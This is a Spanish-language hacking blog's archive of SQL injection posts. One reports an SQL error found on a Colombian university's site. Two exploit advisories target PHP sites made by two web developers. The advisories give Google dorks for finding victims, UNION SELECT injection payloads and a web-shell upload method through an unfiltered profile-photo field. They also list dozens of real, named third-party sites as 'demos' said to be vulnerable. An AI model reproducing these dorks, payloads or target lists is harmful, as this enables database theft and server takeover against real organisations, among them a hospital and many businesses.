Archivo de la etiqueta: sql injection

Error de SQL en la pagina web de la Universidad Javeriana de Colombia

bnner1.jpg

BIEN, ESTA TARDE ME ENCONTRE CON UNA SECCION DE LA WEB DE LA UNIVERSIDAD JAVERIANA DE COLOMBIA, ME LLAMO LA ATENCION VER QUE CONTENIA ARCHIVOS .PHP Y DECIDI IR EN BUSCA DE UNA COMBINACION DE PARAMETROS ID. DESPUES DE EXPLORAR LAS SECCIONES DEL PORTAL ME ENCUENTRO CON UNA, ENTONCES HAGO EL TEST DE LA COMILLA SIMPLE, Y BINGO! NOS HA ARROJADO UN ERROR DE SQL… VER AQUI:

ERRORENLAJAVERIANA

YA CON ESTE ERROR PODEMOS INTENTAR HACER LA FAMOSA INYECCION SQL E INTENTAR HABER QUE SE PUEDE HACER CON ESE FALLO DE SEGURIDAD QUE PRESENTA LA MEJOR UNIVERSIDAD DE COLOMBIA.

BIEN, SI SE DEJA HACER ALGO MAS EL POST CONTINUARA, AUNQUE LA INTENCION DE ESTE CORTO POST ES MOSTRAR SIMPLEMENTE EL ERROR ARROJADO, SIN INTENCION DE DAÑAR LA INTEGRIDAD NI LA SEGURIDAD DE NADIE.

SALU2 A TODOS

@R4Z0R_BL4CK
@insid30utsid3

#ColombianCyberArmy

Anuncios

TECNOMEGA / SQL Injection vulnerability & Shell Upload

# Exploit Title: TECNOMEGA / SQL Injection vulnerability & Shell Upload
# Date: 21/02/2013
# Exploit Author: Diego_Asencio || r4z0r_bl4ck
# Twitter: @r4z0r_bl4ck
# Blog: https://r4z0rbl4ck.wordpress.com/
# Vendor Homepage: http://www.tecnomega.net/
# Tested on: Linux Ubuntu
# Categoria: WebApps – PHP
# Google Dork: inurl:.php?id= intext:Desarrollado por TECNOMEGA || inurl:registrarme.php intext:Desarrolado por TECNOMEGA
# WorkGroup: @inside0utside

-= INFORMACION =-

La Empresa Digital TECNOMEGA desarrolla aplicaciones web en lenguaje PHP, en el cual no tienen en cuenta el filtrado de variables, ni el filtrado de extenciones de archivos en los ‘uploads’ o subidores de archivos, permitiendo a un atacante subir su phpshell por medio de un formulario de registro de usuario normal, o realizando la inyeccion de SQL para obtener los datos del usuario administrador

-= MYSQL ERROR =-

Error
SELECT * FROM productos WHERE marca=’1” AND estado=’1′ ORDER BY nombre ASC limit 0,16
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1’ ORDER BY nombre ASC limit 0,16′ at line 1

-= XPL (PoC) =-

1) => http://127.0.0.1/*.php?id=1+union+all+select+0,1,2,3,4– [SQL Injection]

2) => http://127.0.0.1/registrarme.php [Shell Upload]

-= DEMO’s =-

http://itouch.com.co/detalle-accesorio.php?id=362 (SQLi)
http://www.revistacolombianadesaludocupacional.co/autor-detalle.php?id=49 (SQLi)
http://tecnomega.net/productos-marcas.php?id=15 (SQLi)
http://www.unilibrecali.edu.co/Revista_Colombiana_Salud_Ocupacional/autor-detalle.php?id=42 (SQLi)
http://dkrinmobiliaria.com/detalle_inmueble.php?id=36 (SQLi)
http://megatec.com.co/noticias.php?id=9 (SQLi)
http://www.computiendaelectronica.com/detalle_producto.php?id=189 (SQLi)

=> Asi Mismo, para subir shell el dominio seria el mismo, pero con el directorio /registrarme.php donde en el campo para subir la foto de perfil, se colara la WebShell en el servidor por no filtrar extenciones en los formularios de uploads

#################################
Agradecimientos a:

@inside0utside – t34m /
– all members

@R4z0r_Bl4ck
@Sr_Xaoc
@MaximusWell
@MikeSoft
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

(0day) debliteckservices / SQL Injection vulnerability

0day

 

# Exploit Title: debliteckservices / SQL Injection vulnerability
# Date: 02/02/2013
# Exploit Author: Diego_Asencio || r4z0r_bl4ck
# Twitter: @r4z0r_bl4ck
# Blog: https://r4z0rbl4ck.wordpress.com/
# Vendor Homepage: http://www.debliteckservices.com/
# Tested on: Windows Ultimate – Linux Ubuntu
# Categoria: WebApps – PHP
# Google Dork: inurl:gallery.php?id= intext:Debliteck
# WorkGroup: @inside0utside

-= INFORMACION =-

La empresa debliteckservices dedicada al diseño y desarrollo web, dentro de su portafolio de trabajo contiene paginas web en lenguaje PHP con vulnerabilidad de SQL, la cual permite al atacante inyectar peticiones o consultas a la base de datos.

 

-= MYSQL ERROR’s =-

1) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ and state=’ACTIVE’ order by sort limit 0,12′ at line 1

2) Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/h/o/domain/public_html/include/function.php on line 97

3) Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/x/y/domain/public_html/header.php on line 82

4) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/n/o/domain/web/public_html/header.php on line 13

 
-= XPL (PoC) =-

http://127.0.0.1/gallery.php?id=1+union+all+select+0,1,2,3,4

http://127.0.0.1/section.php?id=1+union+all+select+0,1,2,3,4

http://127.0.0.1/article.php?id=1+union+all+select+0,1,2,3,4

 

-= DEMO’s =-

http://www.st-raphaelhospital.com/gallery.php?id=6 (SQLi)
http://www.coralsearesorts.eu/gallery.php?id=15 (SQLi)
http://www.nplanitis.com/gallery.php?id=8 (SQLi)
http://www.camel-park.com/gallery.php?id=2 (SQLi)
http://www.underseawalkers.com/gallery.php?id=1 (SQLi)
http://www.bellsinn.com/gallery.php?id=2 (SQLi)
http://www.olympicresidence.com/gallery.php?id=13 (SQLi)
http://www.kanika-ibc.com/gallery.php?id=2 (SQLi)
http://www.limocy.com/gallery.php?id=4 (SQLi)
http://www.demetriseliaproperties.com/gallery.php?id=3 (SQLi)
http://www.forcecars.com/gallery.php?id=1 (SQLi)
http://www.newfamagustahotel.com/gallery.php?id=6 (SQLi)

http://d-kombosdevelopers.com/gallery.php?id=7 (SQLi)
http://xylophagou.com/gallery.php?id=3 (SQLi)
http://www.easyriders.com.cy/gallery.php?id=3 (SQLi)
http://www.agf.com.cy/gallery.php?id=1 (SQLi)

http://www.nissi-beach.com/section.php?id=20 (SQLi)
http://www.hotelsayianapa.com/section.php?id=7 (SQLi)

http://www.nozomi.com.cy/article.php?id=45 (SQLi)

 

#################################
Agradecimientos a: @Sr_Xaoc

@inside0utside – t34m /
– all members

@r4z0r_bl4ck
@sr_xaoc
@MaximusWell
@MikeSoft
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-